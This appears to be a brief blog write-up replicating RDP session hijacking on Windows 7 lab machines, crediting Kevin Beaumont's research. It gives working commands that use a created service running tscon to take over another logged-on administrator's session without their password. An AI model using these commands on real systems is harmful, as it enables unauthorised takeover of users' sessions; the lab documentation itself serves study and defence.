RDP Session Hijacking using tscon

I read Kevin Beaumont’s RDP Session Hijacking article in Medium and was amazed on how it worked so I decided to replicate it.

For more information about the RDP Hijacking please check Kevin Beaumont article (https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6).

 

The Setup:
2 virtual machines both running in Windows 7

Attacker Machine

Target Machine

 

In this situation, I already have an administrator account named “blade” on the target machine. The goal is to hijack the session of “superAdmin” which is currently logged on to the target machine.

 

First, I RDP to the target machine using the administrator account “blade”.

 

Using the command “query user” I was able to check the users who are logged on.

 

On the target machine, I created a service that will hijack the session of “superadmin”.

sc create rdphijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0"

Notes: 
The number on the tscon is the ID of superadmin.
For the "/dest" it is the SessionName of the user used for RDP. In this scenario the SessionName is "rdp-tcp#0".

 

Lastly, I started the service I created using the command “net start rdphijack” and successfully got an RDP Session using “superadmin” account.

net start rdphijack

 

Video:

 

Credits:

Kevin Beaumont – @gossithedog
Alexander Korznikov – @nopernik

Leave a Reply

Your email address will not be published. Required fields are marked *

Check this * Time limit is exhausted. Please reload the CAPTCHA.